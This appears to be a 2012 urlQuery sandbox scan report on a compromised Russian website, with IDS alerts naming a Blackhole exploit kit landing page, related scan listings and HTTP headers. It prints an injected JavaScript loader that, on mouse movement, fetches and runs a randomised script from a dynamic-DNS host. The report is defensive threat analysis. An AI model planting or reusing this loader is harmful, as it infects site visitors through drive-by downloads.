Overview

URLhttp://giznsochi.ru/index.php?cat=3
IP77.222.42.229
ASNAS44112 SpaceWeb JSC
Location Russian Federation
Report completed2012-11-07 00:57:04 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-07 00:56:26 77.222.42.229 urlQuery Client3ET RBN Known Russian Business Network IP (336)
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-07 00:56:26 77.222.42.229 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 77.222.42.229

Date Alerts / IDS URL IP
2013-03-18 19:00:240 / 2http://www.ekbmiloserdie.ru/77.222.42.229
2013-03-13 06:31:280 / 4http://z-mk.ru/components/com_jce/editor/tiny_mce/plugins/browser/classes/javascript. (...)77.222.42.229
2013-03-12 07:24:080 / 4http://pitersts.ru/administrator/components/com_content/models/fields/alias.php77.222.42.229
2013-03-02 21:45:400 / 1http://raylink.ru77.222.42.229
2013-03-01 13:46:130 / 1http://raylink.ru77.222.42.229
2013-02-24 07:00:450 / 11http://raylink.ru/wp-content/plugins/achaprvd.html77.222.42.229

Last 6 reports on ASN: AS44112 SpaceWeb JSC

Date Alerts / IDS URL IP
2013-03-21 13:22:240 / 2http://samodardeti.ru/administrator/components/com_plugins/helpers/menu.php77.222.40.233
2013-03-21 10:26:571 / 1http://www.barnaulpatron.ru/77.222.40.237
2013-03-21 07:32:540 / 0http://imperiy-group.ru/templates/ja_purity/check.php77.222.61.242
2013-03-21 07:00:092 / 44http://smaltmosaic.com/wp-content/plugins/wp-plugin-repo-stats/wps.php?c00277.222.40.192
2013-03-21 01:56:150 / 3http://spaufa1.ru/77.222.40.153
2013-03-20 22:50:251 / 2http://smaltmosaic.com/wp-content/plugins/wp-plugin-repo-stats/wps.php?c00277.222.40.192

Last 6 reports on domain: giznsochi.ru

Date Alerts / IDS URL IP
2012-11-20 09:19:520 / 2http://giznsochi.ru/index.php?act=477.222.42.229
2012-11-17 18:44:090 / 2http://giznsochi.ru/index.php?cat=477.222.42.229
2012-11-07 16:02:560 / 2http://giznsochi.ru/index.php?cat=277.222.42.229
2012-11-07 01:02:490 / 2http://giznsochi.ru/index.php?act=477.222.42.229
2012-11-06 19:45:150 / 2http://giznsochi.ru/index.php?act=277.222.42.229
2012-11-06 10:16:350 / 2http://giznsochi.ru/index.php?act=277.222.42.229



JavaScript

Executed Scripts (1)


Executed Evals (1)

#1 JavaScript::Eval (size: 699, repeated: 1) 

(function() {
    var url = 'http://8rm25dkc.xukddhgakc.dyndns-at-home.com/g/';
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function() {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();

Executed Writes (0)



HTTP Transactions (10)


Request Response 
GET /index.php?cat=3 HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
GET /style.css HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: text/css

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Sat, 20 Sep 2008 08:19:25 GMT
Etag: "168e0d6-8a1-79d6dd40"
Accept-Ranges: bytes
Content-Length: 2209
GET /userfiles/image/1_02.jpg HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1ba-367f-ff322180"
Accept-Ranges: bytes
Content-Length: 13951
GET /userfiles/image/1_01.gif HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: image/gif

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:32 GMT
Etag: "176a1b8-30cd-ff50a600"
Accept-Ranges: bytes
Content-Length: 12493
GET /userfiles/image/1_11.jpg HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1be-57f-ff322180"
Accept-Ranges: bytes
Content-Length: 1407
GET /userfiles/image/1_05.gif HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: image/gif

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1bb-10e-ff322180"
Accept-Ranges: bytes
Content-Length: 270
GET /images/1_08.gif HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: image/gif

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:17:36 GMT
Etag: "169a12e-52-fbfa2800"
Accept-Ranges: bytes
Content-Length: 82
GET /userfiles/image/1_09.jpg HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1bd-b5f9-ff322180"
Accept-Ranges: bytes
Content-Length: 46585
GET /favicon.ico HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Content-Length: 209
GET /favicon.ico HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:30 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Content-Length: 209